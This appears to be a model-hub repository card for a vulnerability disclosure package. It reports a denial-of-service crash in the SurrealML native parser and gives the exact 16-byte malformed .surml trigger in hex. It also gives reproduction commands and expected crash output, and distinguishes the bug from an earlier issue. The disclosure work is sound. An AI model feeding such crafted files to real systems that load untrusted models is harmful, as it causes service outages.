You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

Log in or Sign Up to review the conditions and access this model content.

YAML Metadata Warning:empty or missing yaml metadata in repo card

Check out the documentation for more information.

SurrealML Parser DoS β€” PoC Package

Finding: A 16-byte malformed .surml model file causes deterministic process abort in the native SurrealML parser before ONNX runtime initialization.

Impact: DoS (process abort). No RCE, no ACE, no memory corruption claimed.

Affected: surrealml==0.0.4 / libc_wrapper.so v0.1.2 (released 2025-04-29)

Route: huntr MFV (Model Format Vulnerability)


Summary

The SurrealML native parser (libc_wrapper.so) reads the first 4 bytes of a .surml file as a little-endian u32 and uses this value directly as a Vec<u8> allocation length without any bounds check. Providing a value of 0xFFFFFFFF (4,294,967,295) causes the allocator to fail, triggering a Rust panic which β€” because the library is compiled with panic = abort β€” immediately kills the process with SIGABRT (exit code 134).

The crash occurs before ONNX runtime initialization. The ONNX runtime is not required to reproduce this issue.


Files

File Description
reproduce_direct_ctypes_crash.py Primary reproduction script β€” direct ctypes path
mf_maxlen.surml Trigger file (16 bytes, first u32 = 0xFFFFFFFF)
mf_issue20_control.surml Control file β€” demonstrates prior-art distinction
requirements.txt surrealml==0.0.4
evidence_crash_matrix.json 3-run crash evidence with threshold analysis
evidence_prior_art_distinction.json Distinction from GitHub issue #20
evidence_environment.json Library version and ONNX bypass method
SHA256SUMS.txt SHA256 hashes for all files

Reproduction

pip install surrealml==0.0.4
python reproduce_direct_ctypes_crash.py

Expected output:

[INFO] surrealml version: 0.0.4
[INFO] libc_wrapper.so: <path>
[INFO] Trigger: mf_maxlen.surml (16 bytes)
[INFO] Trigger SHA256: 231f5cecc61699ca90f5e9acdbc4c47552f66daeb7ef55327cb7574cda9f29e5
[INFO] SHA256 verified βœ“
[CONTROL] Control file result: is_error=1 (safe β€” prior art path is fixed in v0.1.2)
[CRASH TEST] Running crash in subprocess...
[CRASH TEST] Child exit code: 134
[CRASH TEST] Child stderr: memory allocation of 4294967295 bytes failed
[RESULT] PASS β€” deterministic SIGABRT confirmed (exit 134, expected allocation failure message)

How the Crash Works

.surml file layout (first 4 bytes):
  [0:4]  u32 LE β†’ header_length (used directly as Vec<u8> allocation size)
  [4:4+header_length] β†’ header body

mf_maxlen.surml:
  ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00
  β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
  header_length = 4,294,967,295 bytes

Result: Vec::with_capacity(4294967295) β†’ allocator failure β†’ panic (abort) β†’ SIGABRT

The ONNX runtime is not involved. The crash occurs in load_model() before any ONNX-related code path.

ONNX bypass: link_onnx() returns an error struct (ONNX runtime extraction fails in some environments). This error is intentionally ignored in the reproduction script. The load_model() crash occurs independently.


Prior-Art Distinction

This finding is distinct from GitHub issue #20:

Issue #20 This Finding
Filed Jan 2024 May 2026
Trigger 3717-byte file, first u32 = 757,932,081 16-byte file, first u32 = 4,294,967,295
Crash type OOB slice index Vec allocation failure
Crash message range end index ... out of range for slice memory allocation of N bytes failed
Fixed in v0.1.2? Yes β€” returns is_error=1 safely No β€” SIGABRT
Fix location Server-side only (surrealdb PR #3773) Not fixed in libc_wrapper.so

Control file verification: mf_issue20_control.surml (exact issue #20 trigger) returns is_error=1 gracefully in v0.1.2. This confirms the prior-art path is handled, while the allocation-exhaustion path is not.


Non-Claims

This PoC does not claim:

  • Remote code execution (RCE)
  • Arbitrary code execution (ACE)
  • Memory corruption / buffer overflow / heap spray
  • Privilege escalation
  • SurrealDB server compromise
  • High or Critical severity
  • CVSS score

The impact is limited to deterministic process abort (DoS) when loading an untrusted .surml file.


Trigger File

Name:   mf_maxlen.surml
Size:   16 bytes
Hex:    ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00
SHA256: 231f5cecc61699ca90f5e9acdbc4c47552f66daeb7ef55327cb7574cda9f29e5
Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. πŸ™‹ Ask for provider support